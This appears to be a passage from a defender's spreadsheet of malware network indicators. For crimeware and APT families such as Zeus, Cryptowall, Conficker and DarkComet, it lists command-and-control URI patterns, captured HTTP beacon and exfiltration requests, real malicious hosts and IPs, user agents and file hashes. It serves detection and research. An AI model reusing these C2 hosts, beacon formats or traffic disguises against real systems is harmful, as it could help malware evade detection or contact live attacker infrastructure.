303 | 2015-01-29 | CRIME | Andromeda / Wauchos | POST | /and/gate.php | /gate.php | POST /and/gate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/4.0 Host: ddnsse3ravis221.com.ua Content-Length: 70 Cache-Control: no-cache Pragma: no-cache BluO7awLMtZaAIV/b4XorzWUEUS000s6jUz7rTt5FY0uIjIc2nZdut5ZShu4vUIz us4= | Mozilla/4.0 | 80 | 607a24ccf8a82796384ae113f29e6ab5 | https://www.virustotal.com/en/file/11f6c17e317e02b71888133656029a322da6ada5f9f11cdfd90127aca0ff6a2a/analysis/ | http://bit.ly/crimesamples | |||||
304 | 2015-01-29 | CRIME | Poweliks click-fraud | GET | /click?sid=8f75f821c687855c53899112090ed27514c7 49fdcid=0 | /click?sid= | 80 | http://www.trendmicro.com/vinfo/us/threat-encyclopedia/malicious-url/6528 | |||||||||
305 | 2015-01-29 | CRIME | Poweliks click-fraud | GET | /click.php?c=3a293fcf1ec6d783daa5c0e6c98d5430fa1 c105d8c9 | /click.php?c= | 80 | http://www.trendmicro.com/vinfo/us/threat-encyclopedia/malicious-url/6528 | |||||||||
306 | 2015-02-01 | CRIME | Yoddos / Darkshell / YoYoDDoS | 75 71 7a d6 75 8a 8e 92 8f 90 ce 8a 91 cd d6 c8 OR uqz.u... ........ | uqz.u... ........ | 60249 | old | ace89709b1ca5db8462d238712ab2ee7 | http://www.arbornetworks.com/images/documents/White%20Papers%20and%20Research/WP_ASERT_EN.pdf | http://bit.ly/crimesamples | |||||||
307 | 2015-02-01 | APT | Cobra / Turla | POST | /%s/%s? uid=%d&context=%s&mode=text&data=%s | 554450c1ecb925693fedbb9e56702646 | |||||||||||
308 | 2015-02-01 | APT | Panda | POST | /forum/login.cgi | /login.cgi | |||||||||||
309 | 2015-02-01 | APT | Panda | POST | /Photos/Query.cgi?loginid= | Query.cgi?loginid= | https://github.com/kbandla/APTnotes/blob/master/2014/AdversaryIntelligenceReport_DeepPanda_0%20(1).pdf | ||||||||||
310 | 2015-02-01 | APT | Aided Frame | GET | /img/js.php | /img/js.php | https://github.com/kbandla/APTnotes/blob/master/2014/Aided_Frame_Aided_Direction.pdf | ||||||||||
311 | 2015-02-01 | APT | Scanbox Watering hole framework | POST | /i/recv.php | /i/recv.php | |||||||||||
312 | 2015-02-01 | CRIME | Blackenergy DDos Bot | GET | /upgrade/f3395cd54cf857ddf8f2056768ff49ae/getcfg.php | /getcfg.php | hxxps://46.165.222.28/upgrade/f3395cd54cf857ddf8f2056768ff49ae/getcfg.php | https://github.com/kbandla/APTnotes/blob/master/2014/BlackEnergy2_Plugins_Router.pdf | |||||||||
313 | 2015-02-01 | APT | Syria Twitter. apk | POST | /contacts | /contacts | POST /contacts HTTP/1.1 Content-Length: 43 Content-Type: application/x-www-form-urlencoded Host: 80.241.223.128:4646 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) contact%26=null%26John+Rogers%26+2175566789 | apk Android | b91315805ef1df07bdbfa07d3a467424 | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-behind-the-syria-conflict.pdf | |||||||
314 | 2015-02-02 | APT | TinyBaron / Miniduke / CosmicDuke | GET | <p> /modules/db/mgr.php? <p> /modules/db/mgr.php?F=3? | /modules/db/mgr.php? | <p> 8e5106565fd96df1308d208d1e3426a3 <p> f22606385080d35551e7f8e8f49b7de9 | http://www.symantec.com/security_response/writeup.jsp?docid=2014-052717-4610-99 | |||||||||
315 | 2015-02-01 | CRIME? | Moure | GET | <p> /db3Hv2VxYi1kZXhgc29tdWsDZGV6YXM= <p> /HEQ5HoZ2LSxkZWFgc29tdWt9CxUKDg BPLBsfR0kzCxMGHG11ay5k <p> /HUQ-EIdsIWdkcGdnLm9yZ2MyGxEEABR FJR4QDwM5GxUWEnRhbG9n <p> /G1clBYJoKWYuZGZkcm90aWs8C14MChZ SLhodAkIyRxYQFnJvdGlr <p> /GFAmHZhsNmducy1vZXRmdWw_HB8YC h1TbwARHUsjBR4GHHBlbnMu <p> /FkooHoZsNCxkZWtuYm9tb3J9CxUAABFP LAEGR0kzAR0XHG1vci5k | 80 | 3a8715ca4dbc233e68e8063b5c76f0f7 <p> 10002e607b1179593df21bd2825ccf17 | http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Moure-D/detailed-analysis.aspx | |||||||||
316 | 2015-02-01 | CRIME | Vundo | GET | <p> /webhp <p> /wpad.dat | <p> /webhp <p> /wpad.dat | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR | 80 | 07c0824d98d7894882171ec40b633b30 | http://home.mcafee.com/VirusInfo/VirusProfile.aspx?key=4216306#none | |||||||
317 | 2015-02-03 | CRIME / APT | Lostdoor RAT | INFO||LostDoor-001|Remote PC|| Windows XP Professional|<time>|511.56 MB|No|C:\\\\WINDOWS\\\\system32\\\\cmd.exe|2:13:42 | |LostDoor-001 | http://bit.ly/crimesamples | |||||||||||
318 | 2015-02-03 | APT | Protux worm | POST | "<p> http://ruthless.hobby-site.com:80/PHqgHumeay5705.mp3 <p> http://202.71.136.14:80/ggBwkFNqDu1869.avi <p> /newTroy.jpg" <p> /http://Microsoft.dumb1.com:80/PHqgHumeay5705.mp3 | <p> .mp3 <p> .rar <p> .avi <p> .jpg | POST http://ruising.webmailerservices.com:80/ggBwkFNqDu1869.avi HTTP/1.1 User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32) Host: ruising.webmailerservices.com Content-Length: 42 Proxy-Connection: keep-alive Pragma: no-cache | Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32) | 80 | POST http://%s:%d/%s | ce4733f42cb169f853abfd38b3ba2ffb 123e186577d3b7deb3f338fa675f3e8a | http://camas.comodo.com/cgi-bin/submit?file=2ed5823001b672a37cecdb01b74ebf3eedb59fb112a551efb4988998aa800ca5 | http://bit.ly/aptsamples | ||||
319 | 2015-02-03 | CRIME | Conficker D / Kido worm | GET | /search?q=0 | /search?q=0 | GET /search?q=0 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR | 80 | 00c62ecb5580ad5a8de3367b0c9cbb13 | |||||||
320 | 2015-02-03 | CRIME | Conficker / Kido worm | GET | / ip checking services | / ip checking services | GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: www.getmyip.org Cache-Control: no-cache GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: www.whatsmyipaddress.com Cache-Control: no-cache GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: checkip.dyndns.org Cache-Control: no-cache | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) | 80 | http://mtc.sri.com/Conficker/ | http://bit.ly/crimesamples | ||||||
321 | 2015-02-03 | CRIME | Dingu / Proxy | GET | <p> /1.jpg <p> http://webemail.bounceme.net:8080/directget42.gif | <p> .jpg <p> .gif | "GET /1.jpg HTTP/1.1 X-HOST: Remote PC@10.0.1.15 User-Agent: Mozilla/5.0 (compatible; MSIE 6.0.1; WININET 5.0) Host: 11.36.214.181 Connection: Keep-Alive Cache-Control: no-cache GET http://webemail.bounceme.net:8080/directget42.gif HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.1.3; Windows NT 5.0.3) Host: webemail.bounceme.net X-HOST: mr-computer@192.168.5.133 Pragma: no-cach | Mozilla/5.0 (compatible; MSIE 6.0.1; WININET 5.0) | 80 | "CONNECT X-HOST": %s | CD19E4D5EC26C1DD72F39537750F0A60 efa1add763eef93e8d759b090bfe518e | http://safezonecast.lgcns.com/Common/MenaceInfo/pop.MenaceInfo.jsp?code=SZ1301-0001NS <p> http://telussecuritylabs.com/threats/show/TSL20130115-05 | http://bit.ly/crimesamples | ||||
322 | 2015-02-03 | CRIME | Dyre | GET | /1/manualec.pdf | GET /1/manualec.pdf HTTP/1.1::~~Accept: text/*, application/*::~~User-Agent: Mazilla/5.0::~~Host: marodz.republika.pl::~~Cache-Control: no-cache: | Mazilla/5.0 | 80 | c97e6f2ad67b2cabc48025ffd5a463f3 | ||||||||
323 | 2015-02-03 | CRIME | Zeus | GET | /ycJ2Jj7r4t3wc6y4/ali.jpg | .jpg | GET /ycJ2Jj7r4t3wc6y4/ali.jpg HTTP/1.1::~~Accept: */*::~~Connection: Close::~~User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)::~~Host: domefocrisis.ru::~~Cache-Control: no-cache::~~::~~ | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) | 80 | ||||||||
324 | 2015-02-03 | CRIME | Cryptowall | POST | /tpnofu223t8h8dl | /tpnofu223t8h8dl | POST /tpnofu223t8h8dl HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded Connection: Close Content-Length: 102 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: macrobiotics-japan.com:65535 Cache-Control: no-cache Parameters: u=0d13e860dc0c8c3fb00b0adb948eefeceedfc07ed3961c5ee80d68db76fee9c76b394d5ecd0065a1f1e1b0fad330eb3855 53 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | 65535 | 7329ed264ceb1a5fe0044844c82d6446 | |||||||
325 | 2015-02-03 | CRIME | Cryptowall | POST | <p> /4175iq691v3l <p> GET /raw <ip-addr.es> <p> /img.php <p> /img5.php <p> /img2.php | /4175iq691v3l <p> /img2.php | GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: ip-addr.es Cache-Control: no-cache GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: curlmyip.com Cache-Control: no-cache GET /raw HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E) Host: myexternalip.com Cache-Control: no-cache POST /4175iq691v3l HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded Connection: Close Content-Length: 102 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E) Host: 94.247.28.29:8080 Cache-Control: no-cache v=7d3b1f369de53be6ead161705e3ed6a7cfaa0d5067b89224f9d74f0e43ee4e018afbf7b63956479ea46fdc19b807c1d3787e | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E) | 81, 8080 | ad9df601fbcc60413af1c0637717add4 | |||||||
326 | 2015-02-03 | CRIME | Galapoper / Tibs Downloader | GET | <p> /pic/tool.jpg <p> /pic/search.jpg <p> /pic/tibs.jpg <p> /pic/proxy.jpg <p> /pic/winlogon.jpg | <p> /pic/tool.jpg <p> /pic/search.jpg <p> /pic/tibs.jpg <p> /pic/proxy.jpg <p> /pic/winlogon.jpg | GET /pic/tibs.jpg HTTP/1.1 Host: uniqcount.net | 80 | 1f866d0d6588c925fcaa8dd664762dee | http://about-threats.trendmicro.com/us/archive/malware/TROJ_GALAPOPE.BB | |||||||
327 | 2015-02-03 | APT | Wykcores | GET | <p> /279843 <p> /279859 <p> /280015 <p> /287171 <p> /315171 <p> /110937 <p> /111968 <p> /113000 <p> /114031 <p> /115062 | GET /279859 HTTP/1.0 Connection: Keep-Alive Accept: */* Host: BufFet.SerVeHttp.com User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Extra-Data-Bind: 88F4324FC88F5340 Extra-Data-Space: 65536 Extra-Data: 4ZFNSAAEAAh0AINAAAAAAgRCHAiCAAwFKAAAXQi/HAA/IAAAgMAAAglAAAQCEAAAjUEBAUAAAAQAAAAAooAAAIAAAAATAAAAOCAAAwKAAAgrAAAA8CAAAANAAAQQAYEAxAQMAQEAEBANAgDA2AQNAMDAwAAOAIEAEBAMAUDA3AQNAADA1AAOAUDAwAwNAQDA1AAMAUDAEBQNAMDAAAwUAUGAyBgdAkGAjBQZAACAQBQYAMGArBAIAIDAAAAAAMFAZBwUAQFAFBQTAAAASBQZA0GAvBAdAUGAgAAUAMEAAAAAAA== Cache-Control: no-cache Pragma: no-cache Content-Length: 0 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | 80 | 085C3C226AB38E79B79055BB0B164E39 | http://www.threatexpert.com/report.aspx?md5=085c3c226ab38e79b79055bb0b164e39 | http://bit.ly/aptsamples | ||||||
328 | 2015-02-04 | ADV | Ads - Zenovia Digital Exchange (not necessarily malicious) | GET | /?wc=Ew5tEwFwAxguBBJxGAoGFggJURMYHHQ= &url=sync%2Ezenoviaexchange%2Ecom%2Fusersync2%2F pubmatic%3F&ref=http%3A%2F%2Fads%2Epubmatic %2Ecom%2FAdServer%2Fjs%2Fshowad%2Ejs | /?wc= | 80 | http://www.adnetworkdirectory.com/ad_networks/?id=473&n=Zenovia+Digital+Exchange | |||||||||
329 | 2015-02-04 | CRIME | EsFury worm | GET | http://0-1-0-0-0-0-0-1-1-0-0-1 -0-0-0-0-1-0-1-0-1-0-1-0-1-1-1-1-1-1-1-.0-0-0-0-0- 0-0-0-0-0-0-0-0-54-0-0-0-0-0-0-0-0-0-0-0-0-0.info/ DATA http://0-1-0-0-0-0-0-1-1-0-0-1 -0-0-0-0-1-0-1-0-1-0-1-0-1-1-1-1-1-1-1-.0-0-0-0-0- 0-0-0-0-0-0-0-0-54-0-0-0-0-0-0-0-0-0-0-0-0-0.info/ VERSION.TXT | /DATA <p> /VERSION.TXT | 80 | 9E684440F4D5F3AFF05FF74497BF865AA676DC4C | http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Worm:Win32/Esfury.A#tab=2 <p> http://www.threatexpert.com/report.aspx?md5=2908b7e5c9802f554c18a8732e23ee7b | ||||||||
330 | 2015-02-04 | CRIME | PornoAsset / LockEmAll Ransomware | GET | /a.php?f=647&e=2 | <p> /c.php?f=635&e=2 <p> /a.php?f=647&e=2 <p> /q.php?f=668&e=2 | hxxp://1.nwnudbg.ru/a.php?f=647&e=2 | 80 | http://www.malwaredomainlist.com/forums/index.php?topic=4625.200;wap2 <p> http://www.malwaredomainlist.com/mdl.php?inactive=on&sort=Reverse&search=&colsearch=All&ascordesc=DESC&quantity=50&page=1673 | ||||||||
331 | 2015-02-04 | CRIME | FakeAV Privacy Center | GET | <p> /dfgsdfsdf.php <p> /mf.php <p> /css/new-mobile.css <p> /js/wsjs.js <p> /js/caf.js | <p> /dfgsdfsdf.php <p> /mf.php <p> /css/new-mobile.css <p> /js/wsjs.js <p> /js/caf.js | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) | 80 | 1fb198e24fc7553ce12cedfecf20258b | https://www.virustotal.com/en/file/3d493a1d49453ace34ee815c7f8687f08e622ee85833e3f6f9d333e758aef89d/analysis/ | |||||||
332 | 2015-02-04 | CRIME | Zeus V2 (drop zone, config) | GET / POST | <p> /panel3/gotobank.php <p> /panel3/ppnl3.exe <p> /panel3/ppnl3.bin <p> /ppnl3.bin | <p> /panel3/gotobank.php <p> /panel3/ppnl3.exe <p> /panel3/ppnl3.bin <p> /ppnl3.bin | http://www.malwaredomainlist.com/mdl.php?search=1lqqcprexq4f4gg84aiisomxt.net&inactive=on | ||||||||||
333 | 2015-02-04 | CRIME | Blathla / Cadro adware | GET | /1.gif | /1.gif | GET /1.gif HTTP/1.1 Accept: */* Host: 122.zzso.cn Connection: Keep-Alive Cache-Control: no-cache | d7c59e5628352169a44d0bf53d7c1b92 | http://www.threatexpert.com/report.aspx?md5=fc320df83492e0795cd4f4ab3a4b8768 | http://bit.ly/crimesamples | |||||||
334 | 2015-02-04 | CRIME | Vundo / Krap | POST | / | / | POST / HTTP/1.1 GZIP: true User-Agent: Mozilla/4.0 (compatible; MSIE 6.0) WinNT 5.1 Host: 85.12.43.104 Content-Length: 112 Cache-Control: no-cache | Mozilla/4.0 (compatible; MSIE 6.0) WinNT 5.1 | 2b1a9fa09ed6756010579143d53f418e | https://www.virustotal.com/en/file/1b9d5cd1a4da9348d8bf7e77d02f0f975f3346b6ce64337a28e1cc66353ea984/analysis/ | http://bit.ly/crimesamples | ||||||
335 | 2015-02-04 | CRIME | Vundo / Krap | POST | /frame.html?NzRAEyKqWxUtKS1LnKdgRjRlxFowM i8xBARyMj0wLmQGBEcHPzRCAz4wRwI0N EMHyI1AAyQw6So0NA | /frame.html? | POST /frame.html?NzRAEyKqWxUtKS1LnKdgRjRlxFowMi8xBARyMj0wLmQGBEcHPzRCAz4wRwI0NEMHyI1AAyQw6So0NA HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0) WinNT 5.1 Host: pancolp.com Content-Length: 182 Cache-Control: no-cache NzRAEyKqWxUtKS1LnKdgRjRlxFowMi8xBARyMj0wLmQGBEcHPzRCAz4wRwI0NEMHyI1AAyQw6So0NEkDOBxCAzRxOnNYWzBmRjRCAzQ0QgM0NEIDNDRCAzQ1QgM0NEIDNDRCAzQ0TyM0NEIDNDRCAzQ0QgM0NEIDNDRCAzQ0QgM0NEIDNDRCAw | Mozilla/4.0 (compatible; MSIE 6.0) WinNT 5.1 | 5e10bbe5e48db06528eb492c1b9d887a | http://bit.ly/crimesamples | |||||||
336 | 2015-02-04 | CRIME | VOlk bot | GET | /WebPanel/priv8/bots.php?name=john&so=5.01&zila=&mail= HTTP/1.1 User-Agent: vb wininet Host: portalcinemark.us | /priv8/bots.php?name=j | GET /WebPanel/priv8/bots.php?name=user&so=5.01&zila=&mail= HTTP/1.1 User-Agent: vb wininet Host: portalcinemark.us | vb wininet | 80 | d49baf1d7a5721c6356f337d392b6fc2 | http://cybercrime-tracker.net/index.php?s=0&m=40&search=vOlk%20Botnet | ||||||
337 | 2015-02-04 | CRIME | Oficla / Sasfis | GET | <p> /21/download.php?expid=0&fid=1 <p> /s/download.php?expid=4&fid=1 <p> /l1/bb.php?v=200&id=554905388&b=9468674099&tm=3 <p> /dmr/bb.php?v=200&id=554905388&b=OLD&tm=3 <p> /np/load.php?spl=hcp&b=ff&o=xp&i=hcp <p> /phpbb/image2/cp.php?i=15 | <p> ?expid= <p> /bb.php?v= <p> /load.php?spl= <p> /cp.php?i= | GET /21/download.php?expid=0&fid=1 HTTP/1.1 Accept: */* UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: avalaz.info Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) | 80 | 2bb16459d424cfa02df19bb47acf57ec | http://www.malwaredomainlist.com/mdl.php?inactive=on&sort=Reverse&search=oficla&colsearch=All&ascordesc=DESC&quantity=50&page=8 | ||||||
338 | 2015-02-04 | APT | Pingbed | GET | /default.htm /default1.htm /default2.htm | /default.htm | GET /default.htm HTTP/1.1 User-Agent: Windows+NT+5.1 Host: <host> Cache-Control: no-cache | Windows+NT+5.1 | 80 | fc8bb55a02854c50cff4afbe141592e1 | https://www.virustotal.com/en/file/587581ec00c1f3f9403a8dca514e82992c84763204c5dd50d7e593042fe83cbf/analysis/ | ||||||
339 | 2015-02-04 | APT | Minaps backdoor | GET / POST | <p> /download/device_ad.asp?device_ t=80546937 06&key=ptvcrcqz&device_id=ad&cv= ptvcrcqzlyepaudko <p> /download/logo.png <p> /download/record.asp?device_t= 2415079444&key=vgrnuebv&device_id =ad&cv=vgrnuebvhauzshyue&result= %0D%0ATime%3A%09Fri%20Apr%2025%2 013%3A09%3A12%202014%0AAgent%3A%09 Mozilla%2F4.0%20(compatible%3B%20MSIE%206.0%3B%20 Win32%3B%20Microsoft%20Windows%20XP%20Professional%20 Service%20Pack%203%20 (build%202600))%0D%0Aid%20error %21%0D%0Ano%20 command%0D%0Arun%20 http%3A%2F%2FAdobeFlash.info.tm%2F download%2Flogo.png%20setup.exe%09%0D%0A Next%3AFri%20Apr%2025 %2014%3A09%3A14%202014%0Adelay %3A3600%20sec%0D%0A%0D%0A <p> POST /download/device_input.asp?device_t =2437266266&key=zqlameug&device_id=ad&cv=zqlameugaocrxjeqi | /download/l | GET /download/device_ad.asp?device_t=8054693706&key=ptvcrcqz&device_id=ad&cv=ptvcrcqzlyepaudko HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: en-gb User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0 ) Host: AdobeFlash.info.tm | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0 ) | 80 | c99fa835350aa9e2427ce69323b061a9 | https://malwr.com/analysis/ZDNlOTExZGRlNTZjNGEyMzkzMmQwOGMxMjI1MTE4NjE/ | ||||||
340 | 2015-02-04 | CRIME | QHost / Orsam / Bicololo | GET | /stat/tuk/183 | /stat/tuk/183 | GET /stat/tuk/183 HTTP/1.1 Accept: */* UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 46.166.165.108:12121 Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) | 1999, 12121. various | af4932b4b2fe4afb4fe981feec61bf3b | http://home.mcafee.com/virusinfo/virusprofile.aspx?key=1735438#none | http://bit.ly/crimesamples | |||||
341 | 2015-02-05 | CRIME | Cryptolocker / DirtyDecrypt | POST | / | cmd in POST | POST / HTTP/1.1 Host: ktbqomgixqhtsxevonpw.com User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; .NET4.0E; Media Center PC 6.0; MASE) Content-Type: multipart/form-data; boundary=EzEtSsOYGuRnWmacZefh Content-Length: 100 Accept-Language: en-us Accept: text/html, application/xml;q=0.9, application/xhtml+xml;q=0.9, image/png, image/jpeg, image/gif, image/x-xbitmap, *\*;q=0.1 Accept-Charset: utf-8, utf-16;q=0.6, *;q=0.1 Pragma: no-cache Connection: close --EzEtSsOYGuRnWmacZefh Content-Disposition: form-data; name="cmd" cr --EzEtSsOYGuRnWmacZefh-- | Mozilla/4.0 (compatible; MSIE 7.0; .NET4.0E; Media Center PC 6.0; MASE) | 80 | 01590ef339e8b7301638b0e4e4972fe7 | www.virustotal.com/en/file/9df6a1f3eef45d15f9a3c587b3fa0ef02c25b40da8c8c87293e5c442c991fd6c/analysis/ <p> http://www.bleepingcomputer.com/forums/t/501540/ransomcrypt-dirtydecryptexe-uses-efs/ | http://bit.ly/crimesamples | |||||
342 | 2015-02-05 | ADV | MarketScore Proxy | POST | /cidpost | http://netmon.net. properties/net.info?adapter= | POST /cidpost HTTP/1.1 Accept: text/html, */* Accept-Language: x-ns1PWzDslUqNxQ,x-ns2Ge2M1OjPOPN X-CSOR-Versions: (0.0.0.0,0.0.0.0) X-M: 168703955 X-H: 62117348 X-OSSProxy: OSSProxy 1.3.337.344 (Build 337.344 Win32 en-us)(Oct 31 2014 12:56:00) Content-Type: text/xml Content-Length: 407 Content-Encoding: deflate X-Uncompressed-Length: 606 User-Agent: OSSProxy 1.3.337.344 (Build 337.344 Win32 en-us)(Oct 31 2014 12:56:00) Host: oss-content.securestudies.com Cache-Control: no-cache | OSSProxy 1.3.337.344 (Build 337.344 Win32 en-us)(Oct 31 2014 12:56:00) | 80 | www.spysweeper.com/remove-marketscore.htm | |||||||
343 | 2015-02-07 | APT | Windata | <p> XYZ /WinData.DLL?HELO-STX-1*10.0.0.15* Remote PC*[MAC:00-55-28-11-21-23 <p> XYZ /WinData.DLL?HELO-STX-1*1[IP Address]* [Computer Name]*0605[MAC:[Mac Address]]$ | WinData.DLL?HELO-STX- | 80 | <p> 5f1225ff619c8ac13e7bf2bf2fe843b7 <p> 5a3ea9e1007e9b6a5bb94d5999d6e022 <p> 7acac1bac83b8c44a2d2f1571e795051 | https://0xicf.wordpress.com/category/courses/ | http://bit.ly/aptsamples | ||||||||
344 | 2015-02-08 | CRIME | Screenblaze / Prosti Adware | GET | <p> /curver.php <p> /scr2.php?id=3&serial=0&ver=2.1.20 | <p> /curver.php <p> /scr2.php?id= | GET /curver.php HTTP/1.1 User-Agent: WinInetHTTP Host: www.screenblaze.com Cache-Control: no-cache GET /scr2.php?id=3&serial=0&ver=2.1.20 HTTP/1.1 User-Agent: WinInetHTTP Host: www.screenblaze.com Cache-Control: no-cache | WinInetHTTP | 80 | 00001ffe4e2c3218db5eecfd16b97a9f | http://totalhash.com/analysis/ae44154b2d9f09e5c0cdbce760f374398784b2e8 | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | ||||
345 | 2015-02-08 | CRIME | Winwebsec / FakeAV Security Shield | GET | /clbk.php?q=OVNaTVhDHkUERx1Y ClgNUghKSFMQRVVDHEdFRR1cFQxjbn Roc2J2eHVDB0JPFwFWEFERAEQe TFBYRgpHWkRNTQAPRw4WUQhI | /clbk.php?q= | GET /clbk.php?q=OVNaTVhDHkUERx1YClgNUghKSFMQRVVDHEdFRR1cFQxjbnRoc2J2eHVDB0JPFwFWEFERAEQeTFBYRgpHWkRNTQAPRw4WUQhI HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) Host: 31.184.232.58 Cache-Control: no-cache | Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) | 80 | http://labs.vericon.li/2012/05/security-shield-2012-schadsoftware-erkennen/ | http://bit.ly/crimesamples | ||||||
346 | 2015-02-08 | CRIME | Virtumonde (old) | POST | <p> g_Version: 25. <p> g_SetID: J`y. <p> g_AffiliateID: y. <p> g_URL: 8. <p> g_Client: <p> g_ClientGUID: <p> g_GZipSupported: <p> g_UID: | POST / HTTP/1.1. g_Version: 25. g_SetID: J`y. g_AffiliateID: y. g_URL: 8. g_Client: .Sf"yG:yGG:JGJ:Nk %uK.q+,y^ZcSy:n}Iy:P'][HA:On] <at> 8/FQ"`:y:J9GGg)O?BFVO S[VE yi8.K"9:G:JNGG:yyG98vR"!GG8Z}V"KQxAFf'86Wn"GGGGGkGh#o)]VV=}QQ"/On +]Q GJ Jy"yh"Gy JGGko=}QQ"/On +]Q GJ Jy"yh"Gy JGGko=}QQp]I"!NofU=}QQOVUv})O?BO?\v'] +]Q G! Gh"yh"Gy JGGkoe;9GGGG>1;!9GGGGG>R;k!JGGGGGo. g_ClientGUID: 0`-N=cc-G^-9XK^k`k,^chcG^c-!!,X-y=h,cb. g_GZipSupported: U?]O. g_UID: jyjjJm[JY|!!cI1Xn[J[INx`w:. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1). Host: virtumonde.com. | 80 | http://blog.gmane.org/gmane.comp.security.ids.snort.sigs/month=20040601/page=3 | http://bit.ly/crimesamples | ||||||||
347 | 2015-02-08 | APT | DarkKomet | <p>8EA4AB05FA7E <p>D573BA5A4EFFC3FB629308 will vary - encrypted keep alive or other data | <p>8EA4AB05FA7E <p>D573BA5A4EFFC3FB629308 | 1604 | 81f12e17ffc59bf0be7ec736f37b2db0 0025cb6f62775a118b94ef22ecc1c05c | http://resources.infosecinstitute.com/darkcomet-analysis-syria/ | http://bit.ly/aptsamples | ||||||||
